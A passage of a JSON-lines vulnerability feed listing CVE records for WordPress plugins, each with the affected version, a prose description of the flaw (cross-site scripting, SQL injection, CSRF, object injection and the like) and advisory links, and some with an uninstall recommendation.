page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedded-cdn\\\/trunk\\\/embedded-cdn.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedded-cdn\\\/trunk\\\/embedded-cdn.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embedded-cdn\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embedded-cdn\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f96a607-a655-413d-9faf-304249edefe8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f96a607-a655-413d-9faf-304249edefe8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1913","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.5.0 via deserialization of untrusted input from the 'form_data' parameter This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4464bb1-273a-42c4-a7ec-8e123d286963?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4464bb1-273a-42c4-a7ec-8e123d286963?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3603","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.0. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8124db-ee6a-481d-88c6-4cc84fefcf1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8124db-ee6a-481d-88c6-4cc84fefcf1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6668","slug":"profilepro","versionImpact":"1.3","description":"The ProfilePro WordPress plugin through 1.3 does not sanitise and escape some parameters and lacks proper access controls, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8faf1409-44e6-4ebf-9a68-b5f93a5295e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8faf1409-44e6-4ebf-9a68-b5f93a5295e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5116","slug":"wp-plugin-info-card","versionImpact":"5.3.1","description":"The WP Plugin Info Card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018containerid\u2019 parameter in all versions up to, and including, 5.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This issue is due to an incomplete patch for CVE-2025-31835.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/DLXPlugins\\\/wp-plugin-info-card\\\/blob\\\/dev\\\/php\\\/Shortcodes.php#L893\",\"name\":\"https:\\\/\\\/github.com\\\/DLXPlugins\\\/wp-plugin-info-card\\\/blob\\\/dev\\\/php\\\/Shortcodes.php#L893\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-plugin-info-card\\\/trunk\\\/php\\\/Shortcodes.php#L929\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-plugin-info-card\\\/trunk\\\/php\\\/Shortcodes.php#L929\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303791\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303791\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-plugin-info-card\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-plugin-info-card\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e29ea7dd-14b8-45d3-a87e-3f58de88af4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e29ea7dd-14b8-45d3-a87e-3f58de88af4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6690","slug":"wp-tournament-registration","versionImpact":"1.3.0","description":"The WP Tournament Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018field\u2019 parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tournament-registration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-tournament-registration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf3c6dd5-498e-4aff-90fb-15ede66f5e3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf3c6dd5-498e-4aff-90fb-15ede66f5e3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4445","slug":"fl3r-feelbox","versionImpact":"8.1","description":"The FL3R FeelBox WordPress plugin through 8.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bb6fde0-1347-496b-be03-3512e6b7e8f8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bb6fde0-1347-496b-be03-3512e6b7e8f8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1924","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_toolbar_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87f610a-c1ef-4365-bd74-569989587d41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87f610a-c1ef-4365-bd74-569989587d41?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2634","slug":"get-your-number","versionImpact":"1.1.3","description":"The Get your number WordPress plugin through 1.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df111aa-6057-47a2-8e8b-9ef5ec3bb472\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df111aa-6057-47a2-8e8b-9ef5ec3bb472\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5615","slug":"skype-online-status","versionImpact":"3.1","description":"The Skype Legacy Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skype-status' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/914bcc8f-fecd-450e-b2a7-0989b7a0dd4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/914bcc8f-fecd-450e-b2a7-0989b7a0dd4c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skype-online-status\\\/tags\\\/3.1\\\/skype-classes.php#L316\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skype-online-status\\\/tags\\\/3.1\\\/skype-classes.php#L316\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5708","slug":"wp-post-columns","versionImpact":"2.2","description":"The WP Post Columns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'column' shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d96e5986-8c89-4e7e-aa63-f41aa13eeff4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d96e5986-8c89-4e7e-aa63-f41aa13eeff4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-columns\\\/trunk\\\/wp_post_columns.php?rev=112013#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-post-columns\\\/trunk\\\/wp_post_columns.php?rev=112013#L59\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1711","slug":"mediavine-create","versionImpact":"1.9.4","description":"The Create by Mediavine plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.9.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc78fa6-a5f0-4f29-ae19-8e783698b19e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediavine-create\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9072","slug":"gdpr-consent-manager","versionImpact":"1.0.0","description":"The GDPR-Extensions-com \u2013 Consent Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ce2a9fe-3364-46b5-a6ae-b4feb3e20647?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ce2a9fe-3364-46b5-a6ae-b4feb3e20647?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gdpr-consent-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gdpr-consent-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9772","slug":"uix-shortcodes","versionImpact":"1.9.9","description":"The The Uix Shortcodes \u2013 Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3000758d-68e0-46a6-aef0-e2407a828168?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3000758d-68e0-46a6-aef0-e2407a828168?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-shortcodes\\\/trunk\\\/shortcodes\\\/templates\\\/default\\\/frontpage-init.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-shortcodes\\\/trunk\\\/shortcodes\\\/templates\\\/default\\\/frontpage-init.php#L9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10178","slug":"gutentor","versionImpact":"3.3.9","description":"The Gutentor \u2013 Gutenberg Blocks \u2013 Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199233%40gutentor%2Ftrunk&old=3179242%40gutentor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199233%40gutentor%2Ftrunk&old=3179242%40gutentor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutentor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutentor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ecebfd-b07f-415f-892f-e069ab84031a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ecebfd-b07f-415f-892f-e069ab84031a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12557","slug":"transportersio","versionImpact":"2.0.84","description":"The Transporters.io plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.84. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/transportersio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/transportersio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f79778c-c11a-4d98-bc26-8113c3fef630?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f79778c-c11a-4d98-bc26-8113c3fef630?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22704","slug":"wordpress-signature","versionImpact":"0.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Abinav Thakuri WordPress Signature allows Cross Site Request Forgery. This issue affects WordPress Signature: from n\/a through 0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-signature\\\/vulnerability\\\/wordpress-wordpress-signature-plugin-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-signature\\\/vulnerability\\\/wordpress-wordpress-signature-plugin-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11753","slug":"umich-oidc-login","versionImpact":"1.2.0","description":"The UMich OIDC Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'umich_oidc_button' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/class-run.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/class-run.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/umich-oidc-login\\\/tags\\\/1.2.0\\\/includes\\\/site\\\/class-shortcodes.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b372ad3a-0056-45fb-9a0e-7604f4fdf240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b372ad3a-0056-45fb-9a0e-7604f4fdf240?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13781","slug":"hmapsprem","versionImpact":"2.3.9","description":"The Hero Maps Premium plugin for WordPress is vulnerable to SQL Injection via several AJAX actions in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-maps-premium-responsive-google-maps-plugin\\\/12577151\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-maps-premium-responsive-google-maps-plugin\\\/12577151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f394209-df80-491f-b700-cc06e54ea676?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f394209-df80-491f-b700-cc06e54ea676?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1912","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the validate_file() Function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406b52dc-3d36-4b03-a932-34f456395979?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/406b52dc-3d36-4b03-a932-34f456395979?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3300","slug":"wpmastertoolkit","versionImpact":"2.5.2","description":"The WPMasterToolKit (WPMTK) \u2013 All in one plugin plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to read and modify the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpmastertoolkit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpmastertoolkit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c389ba1a-45c5-4fba-9b99-0713fe39da42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c389ba1a-45c5-4fba-9b99-0713fe39da42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5103","slug":"woo-gift-cards-lite","versionImpact":"3.1.4","description":"The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to boolean-based SQL Injection via the 'default_price' and 'product_id' parameters in all versions up to, and including, 3.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/3.1.4\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php#L571\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/3.1.4\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php#L571\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303359\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303359\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-gift-cards-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-gift-cards-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e89383-a9c6-4300-970c-0b36e4d97e3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e89383-a9c6-4300-970c-0b36e4d97e3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6259","slug":"esri-map-view","versionImpact":"1.2.3","description":"The esri-map-view plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's esri-map-view shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/esri-map-view\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/esri-map-view\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67001e61-c7f5-46bc-9d32-b121ce5d6fd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67001e61-c7f5-46bc-9d32-b121ce5d6fd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1923","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_remove_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a 